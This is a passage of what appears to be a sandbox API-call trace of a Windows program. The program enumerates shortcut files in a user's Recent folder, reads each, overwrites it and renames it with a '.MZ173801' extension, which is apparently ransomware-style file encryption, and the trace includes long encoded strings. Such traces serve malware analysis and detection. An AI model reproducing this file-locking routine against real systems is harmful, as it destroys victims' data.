lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Videos.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\videos.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea126b1b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x75781b53, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75781b53, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2e5)) returned 1 [0112.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.057] GetCurrentThreadId () returned 0x1358 [0112.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Videos.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\videos.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.058] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.058] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.058] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2e5 [0112.058] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.058] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2e5, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2e5, lpOverlapped=0x0) returned 1 [0112.059] CloseHandle (hObject=0x3f4) returned 1 [0112.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Videos.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\videos.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.060] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x2e5, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2e5, lpOverlapped=0x0) returned 1 [0112.060] CloseHandle (hObject=0x3f4) returned 1 [0112.061] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Videos.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\videos.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Videos.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\videos.lnk.mz173801")) returned 1 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] GetCurrentThreadId () returned 0x1358 [0112.062] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1d7549, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb1d7549, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="VmAilK6Ug.lnk", cAlternateFileName="VMAILK~1.LNK")) returned 1 [0112.062] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.062] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VmAilK6Ug.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vmailk6ug.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea97eea1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb1d7549, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb1d7549, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x4ad)) returned 1 [0112.062] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.063] GetCurrentThreadId () returned 0x1358 [0112.063] GetCurrentThreadId () returned 0x1358 [0112.063] GetCurrentThreadId () returned 0x1358 [0112.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.064] GetCurrentThreadId () returned 0x1358 [0112.064] GetCurrentThreadId () returned 0x1358 [0112.064] GetCurrentThreadId () returned 0x1358 [0112.064] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VmAilK6Ug.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vmailk6ug.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.064] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.064] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.064] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4ad [0112.064] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.064] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4ad, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x4ad, lpOverlapped=0x0) returned 1 [0112.065] CloseHandle (hObject=0x3f4) returned 1 [0112.065] 